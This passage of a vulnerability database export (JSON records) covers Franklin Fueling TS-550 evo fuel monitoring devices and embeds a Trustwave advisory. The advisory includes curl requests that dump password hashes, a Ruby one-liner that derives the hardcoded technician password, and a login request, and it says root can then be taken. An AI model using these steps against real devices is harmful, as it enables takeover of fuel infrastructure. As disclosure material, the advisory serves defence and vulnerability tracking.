            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2017-6565",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "NVD",
                "id": "CVE-2017-6565",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201703-388",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULHUB",
                "id": "VHN-114768",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-114768"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-003717"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201703-388"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-6565"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "On Franklin Fueling Systems TS-550 evo 2.3.0.7332 devices, the roleDiag user, which can be obtained by exploiting CVE-2013-7247, has the ability to upload files to the server hosting the web service. As no sanitization checks are in place, an attacker can upload a malicious payload. Franklin Fueling Systems TS-550 evo is a fuel management system from Franklin Fueling Systems in the United States. The system is used to monitor fuel storage and provides an intuitive and easy-to-read interface for alarm functions. A security vulnerability exists in Franklin Fueling Systems TS-550 evo version 2.3.0.7332",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2017-6565"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-003717"
          },
          {
            "db": "VULHUB",
            "id": "VHN-114768"
          }
        ],
        "trust": 1.71
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2017-6565",
            "trust": 2.5
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-003717",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201703-388",
            "trust": 0.7
          },
          {
            "db": "VULHUB",
            "id": "VHN-114768",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-114768"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-003717"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201703-388"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-6565"
          }
        ]
      },
      "id": "VAR-201705-3686",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-114768"
          }
        ],
        "trust": 0.01
      },
      "last_update_date": "2025-04-20T23:25:02.535000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "TS-550 evo \u0026 TS-5000 evo",
            "trust": 0.8,
            "url": "http://www.franklinfueling.com/americas/fms/featured/1697/en/ts-550-evo-ts-5000-evo#Highlights"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-003717"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-862",
            "trust": 1.1
          },
          {
            "problemtype": "CWE-284",
            "trust": 0.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-114768"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-003717"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-6565"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.5,
            "url": "http://www.u235.io/single-post/2017/05/01/penetrating-fuel-management-systems"
          },
          {
            "trust": 1.7,
            "url": "https://gist.github.com/stick-u235/b187931f828e92866d09b9bdeb956ca2"
          },
          {
            "trust": 0.8,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-6565"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2017-6565"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-114768"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-003717"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201703-388"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-6565"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULHUB",
            "id": "VHN-114768"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-003717"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201703-388"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-6565"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2017-05-01T00:00:00",
            "db": "VULHUB",
            "id": "VHN-114768"
          },
          {
            "date": "2017-06-05T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2017-003717"
          },
          {
            "date": "2017-03-10T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201703-388"
          },
          {
            "date": "2017-05-01T19:59:00.207000",
            "db": "NVD",
            "id": "CVE-2017-6565"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-10-03T00:00:00",
            "db": "VULHUB",
            "id": "VHN-114768"
          },
          {
            "date": "2017-06-05T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2017-003717"
          },
          {
            "date": "2019-10-23T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201703-388"
          },
          {
            "date": "2025-04-20T01:37:25.860000",
            "db": "NVD",
            "id": "CVE-2017-6565"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201703-388"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Franklin Fueling Systems TS-550 evo Device access control vulnerability",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-003717"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "lack of information",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201703-388"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201401-0295

    Vulnerability from variot - Updated: 2025-04-11 22:53

    cgi-bin/tsaws.cgi in Franklin Fueling Systems TS-550 evo with firmware 2.0.0.6833 and other versions before 2.4.0 allows remote attackers to discover sensitive information (user names and password hashes) via the cmdWebGetConfiguration action in a TSA_REQUEST. Franklin Fueling Systems are prone to a security bypass vulnerability. Successfully exploiting this issue may allow an attacker to gain access to sensitive configuration information including credentials. This may aid in further attacks. Franklin Fueling Systems 2.0.0.6833 is vulnerable; other versions may also be affected. The system is used to monitor fuel storage and provides an intuitive and easy-to-read interface for alarm functions. Affected versions: prior to 2.4.0.

    Product description: A fuel management system with a programmable interface used for inventory and delivery management.

    Finding 1: Insufficient Access Control. Credit: Nate Drier and Matt Jakubowski of Trustwave SpiderLabs. CVE: CVE-2013-7247. CWE: CWE-200.

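    As the Guest user (the lowest privilege), a user can post the cmdWebGetConfiguration parameter to cgi-bin/tsaws.cgi. This will return the usernames and password hashes (in DES format, i.e. traditional DES-based crypt hashes) for all users of the application. Once dumped, they can be cracked and used to access authenticated portions of the application. Because these hashes are weak by modern standards, every account password on a device that exposed this interface while running affected firmware should be considered disclosed and changed once the firmware has been updated.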

    Request

    curl -H "Content-Type:text/xml" --data '' http://:10001/cgi-bin/tsaws.cgi

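    Response (the XML response body, which lists the user names and password hashes, is not reproduced in this copy)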

    Finding 2: Hardcoded Technician Credentials. Credit: Nate Drier and Matt Jakubowski of Trustwave SpiderLabs. CVE: CVE-2013-7248. CWE: CWE-798.

    The three primary users on the TS550 are roleGuest, roleUser, and roleAdmin. Another user exists with additional access named roleDiag. This user can access extra portions of the application such as the command line interface, enable and disable SSH, as well as run SQL commands all from the web interface. The CLI interface includes the ability to run engineering and manufacturing commands. The password for roleDiag is the key (a value returned with every POST request to tsaws.cgi) DES encrypted. This can be done in Ruby:

    $ irb 1.9.3p374 :001 > "11111111".crypt("aa") => "aaDTlAa1fGGC."

    Request

    curl -H "Content-Type:text/xml" --data '' http://:10001/cgi-bin/tsaws.cgi

    Response (note the ROLE; the XML response body is not reproduced in this copy)

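    The password can then be used to run various roleDiag commands. An attacker can enable SSH, and since root's password is the same as roleAdmin, they can completely compromise the device. The vendor released a fix on a limited basis (see Revision History below; versions prior to 2.4.0 are listed as affected). However, Trustwave SpiderLabs have not verified this fix.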

    Revision History: 04/16/13 - Vulnerability disclosed to vendor; 12/18/13 - Fix released on a limited basis by vendor; 01/03/14 - Advisory published.

    References 1. http://www.franklinfueling.com/evo/

    About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com

    About Trustwave's SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs

    Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.




    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201401-0295",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "ts-550 evo",
            "scope": "eq",
            "trust": 1.9,
            "vendor": "franklinfueling",
            "version": "2.0.0.6833"
          },
          {
            "model": "ts-550 evo",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "franklinfueling",
            "version": "2.3.1.7492"
          },
          {
            "model": "ts-550 evo",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "franklinfueling",
            "version": null
          },
          {
            "model": "ts-550 evo",
            "scope": null,
            "trust": 0.8,
            "vendor": "franklin fueling",
            "version": null
          },
          {
            "model": "ts-550 evo",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "franklin fueling",
            "version": "2.0.0.6833"
          },
          {
            "model": "ts-550 evo",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "franklin fueling",
            "version": "2.4.0"
          },
          {
            "model": "ts-550 evo",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "franklinfueling",
            "version": "2.4.0"
          }
        ],
        "sources": [
          {
            "db": "BID",
            "id": "64996"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005928"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201401-415"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-7247"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/h:franklinfueling:ts-550_evo",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:franklinfueling:ts-550_evo_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005928"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Nate Drier and Matt Jakubowski of TrustWave SpiderLabs",
        "sources": [
          {
            "db": "BID",
            "id": "64996"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201401-415"
          }
        ],
        "trust": 0.9
      },
      "cve": "CVE-2013-7247",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 5.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CVE-2013-7247",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 1.8,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "NONE",
                "baseScore": 5.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "VHN-67249",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2013-7247",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "NVD",
                "id": "CVE-2013-7247",
                "trust": 0.8,
                "value": "Medium"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201401-415",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULHUB",
                "id": "VHN-67249",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-67249"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005928"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201401-415"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-7247"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "cgi-bin/tsaws.cgi in Franklin Fueling Systems TS-550 evo with firmware 2.0.0.6833 and other versions before 2.4.0 allows remote attackers to discover sensitive information (user names and password hashes) via the cmdWebGetConfiguration action in a TSA_REQUEST. Franklin Fueling Systems are prone to a security bypass vulnerability. \nSuccessfully exploiting this issue may allow an attacker to gain access to sensitive configuration information including credentials. This may aid in further attacks. \nFranklin Fueling Systems 2.0.0.6833 is vulnerable; other versions may also be affected. The system is used to monitor fuel storage and provides an intuitive and easy-to-read interface for alarm functions.  Affects prior to version\n2.4.0\n\nProduct description:\nA fuel management system with a programmable interface used for inventory\nand delivery management. \n\nFinding 1: Insufficient Access Control\nCredit: Nate Drier and Matt Jakubowski of Trustwave SpiderLabs\nCVE: CVE-2013-7247\nCWE: CWE-200\n\nAs the Guest user (the lowest privilege), a user can post the\ncmdWebGetConfiguration parameter to cgi-bin/tsaws.cgi. This will return the\nusernames and password hashes (in DES format) for all users of the\napplication. Once dumped, they can be cracked and used to access\nauthenticated portions of the application. 
\n\n\n#Request\n\ncurl -H \"Content-Type:text/xml\" --data \u0027\u003cTSA_REQUEST_LIST\u003e\u003cTSA_REQUEST COMMAND=\"cmdWebGetConfiguration\"/\u003e\u003c/TSA_REQUEST_LIST\u003e\u0027 http://\u003cip\u003e:10001/cgi-bin/tsaws.cgi\n\n#Response\n\n\u003cTSA_RESPONSE_LIST VERSION=\"2.0.0.6833\" TIME_STAMP=\"2013-02-19T22:09:22Z\" TIME_STAMP_LOCAL=\"2013-02-19T17:09:22\" KEY=\"11111111\" ROLE=\"roleGuest\"\u003e\u003cTSA_RESPONSE COMMAND=\"cmdWebGetConfiguration\"\u003e\u003cCONFIGURATION\u003e\n    \u003cDEBUGGING LOGGING_ENABLED=\"false\" LOGGING_PATH=\"/tmp\"/\u003e\n    \u003cROLE_LIST\u003e\n        \u003cROLE NAME=\"roleAdmin\" PASSWORD=\"YrKMc2T2BuGvQ\"/\u003e\n        \u003cROLE NAME=\"roleUser\" PASSWORD=\"2wd2DlEKUPTr2\"/\u003e\n        \u003cROLE NAME=\"roleGuest\" PASSWORD=\"YXFCsq2GXFQV2\"/\u003e\n    \u003c/ROLE_LIST\u003e\n\u003c/CONFIGURATION\u003e\u003c/TSA_RESPONSE\u003e\u003c/TSA_RESPONSE_LIST\u003e\n\nFinding 2: Hardcoded Technician Credentials\nCredit: Nate Drier and Matt Jakubowski of Trustwave SpiderLabs\nCVE: CVE-2013-7248\nCWE: CWE-798\n\nThe three primary users on the TS550 are roleGuest, roleUser, and\nroleAdmin.  Another user exists with additional access named roleDiag. This\nuser can access extra portions of the application such as the command line\ninterface, enable and disable SSH, as well as run SQL commands all from the\nweb interface.  The CLI interface includes the ability to run engineering\nand manufacturing commands.  The password for roleDiag is the key (a value\nreturned with every POST request to tsaws.cgi) DES encrypted.  
This can be\ndone in Ruby:\n\n\n$ irb\n1.9.3p374 :001 \u003e \"11111111\".crypt(\"aa\")\n =\u003e \"aaDTlAa1fGGC.\"\n\n#Request\n\ncurl -H \"Content-Type:text/xml\" --data \u0027\u003cTSA_REQUEST_LIST PASSWORD=\"aaDTlAa1fGGC.\"\u003e\u003cTSA_REQUEST COMMAND=\"cmdWebCheckRole\"/\u003e\u003c/TSA_REQUEST_LIST\u003e\u0027 http://\u003cip\u003e:10001/cgi-bin/tsaws.cgi\n\n#Response (note the ROLE)\n\n\u003cTSA_RESPONSE_LIST VERSION=\"2.0.0.6833\" TIME_STAMP=\"2013-03-04T16:53:01Z\" TIME_STAMP_LOCAL=\"2013-03-04T11:53:01\" KEY=\"11111111\" ROLE=\"roleDiag\"\u003e\u003cTSA_RESPONSE COMMAND=\"cmdWebCheckRole\"\u003e\u003c/TSA_RESPONSE\u003e\u003c/TSA_RESPONSE_LIST\u003e\n\nThe password can then be used to run various roleDiag commands. An attacker\ncan enable SSH, and since root\u0027s password is the same as roleAdmin, they\ncan completely compromise the device. However, Trustwave SpiderLabs have not verified this fix. \n\n\nRevision History:\n04/16/13 - Vulnerability disclosed to vendor\n12/18/13 - Fix released on a limited basis by vendor\n01/03/14 - Advisory published\n\nReferences\n1. http://www.franklinfueling.com/evo/\n\n\nAbout Trustwave:\nTrustwave is the leading provider of on-demand and subscription-based\ninformation security and payment card industry compliance management\nsolutions to businesses and government entities throughout the world. For\norganizations faced with today\u0027s challenging data security and compliance\nenvironment, Trustwave provides a unique approach with comprehensive\nsolutions that include its flagship TrustKeeper compliance management\nsoftware and other proprietary security solutions. Trustwave has helped\nthousands of organizations--ranging from Fortune 500 businesses and large\nfinancial institutions to small and medium-sized retailers--manage\ncompliance and secure their network infrastructure, data communications and\ncritical information assets. 
Trustwave is headquartered in Chicago with\noffices throughout North America, South America, Europe, Africa, China and\nAustralia. For more information, visit https://www.trustwave.com\n\nAbout Trustwave\u0027s SpiderLabs:\nSpiderLabs(R) is the advanced security team at Trustwave focused on\napplication security, incident response, penetration testing, physical\nsecurity and security research. The team has performed over a thousand\nincident investigations, thousands of penetration tests and hundreds of\napplication security tests globally. In addition, the SpiderLabs Research\nteam provides intelligence through bleeding-edge research and proof of\nconcept tool development to enhance Trustwave\u0027s products and services. \nhttps://www.trustwave.com/spiderlabs\n\nDisclaimer:\nThe information provided in this advisory is provided \"as is\" without\nwarranty of any kind. Trustwave disclaims all warranties, either express or\nimplied, including the warranties of merchantability and fitness for a\nparticular purpose. In no event shall Trustwave or its suppliers be liable\nfor any damages whatsoever including direct, indirect, incidental,\nconsequential, loss of business profits or special damages, even if\nTrustwave or its suppliers have been advised of the possibility of such\ndamages. Some states do not allow the exclusion or limitation of liability\nfor consequential or incidental damages so the foregoing limitation may not\napply. \n\n________________________________\n\nThis transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is strictly prohibited. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2013-7247"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005928"
          },
          {
            "db": "BID",
            "id": "64996"
          },
          {
            "db": "VULHUB",
            "id": "VHN-67249"
          },
          {
            "db": "PACKETSTORM",
            "id": "124873"
          }
        ],
        "trust": 2.07
      },
      "exploit_availability": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "reference": "https://www.scap.org.cn/vuln/vhn-67249",
            "trust": 0.1,
            "type": "unknown"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-67249"
          }
        ]
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2013-7247",
            "trust": 2.9
          },
          {
            "db": "BID",
            "id": "64996",
            "trust": 1.0
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005928",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201401-415",
            "trust": 0.7
          },
          {
            "db": "SECUNIA",
            "id": "56185",
            "trust": 0.6
          },
          {
            "db": "SEEBUG",
            "id": "SSVID-84525",
            "trust": 0.1
          },
          {
            "db": "EXPLOIT-DB",
            "id": "31180",
            "trust": 0.1
          },
          {
            "db": "VULHUB",
            "id": "VHN-67249",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "124873",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-67249"
          },
          {
            "db": "BID",
            "id": "64996"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005928"
          },
          {
            "db": "PACKETSTORM",
            "id": "124873"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201401-415"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-7247"
          }
        ]
      },
      "id": "VAR-201401-0295",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-67249"
          }
        ],
        "trust": 0.01
      },
      "last_update_date": "2025-04-11T22:53:07.945000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "TS-550 evo",
            "trust": 0.8,
            "url": "http://www.franklinfueling.com/americas/en/ts-550-evo"
          },
          {
            "title": "ts550evo-2327608",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=47720"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005928"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201401-415"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-264",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-67249"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005928"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-7247"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.8,
            "url": "https://www.trustwave.com/spiderlabs/advisories/twsl2014-001.txt"
          },
          {
            "trust": 0.8,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-7247"
          },
          {
            "trust": 0.8,
            "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-7247"
          },
          {
            "trust": 0.6,
            "url": "http://secunia.com/advisories/56185"
          },
          {
            "trust": 0.6,
            "url": "http://www.securityfocus.com/bid/64996"
          },
          {
            "trust": 0.3,
            "url": "http://www.franklinfueling.com/americas/en"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-7247"
          },
          {
            "trust": 0.1,
            "url": "http://www.franklinfueling.com/evo/"
          },
          {
            "trust": 0.1,
            "url": "https://www.trustwave.com/spiderlabs"
          },
          {
            "trust": 0.1,
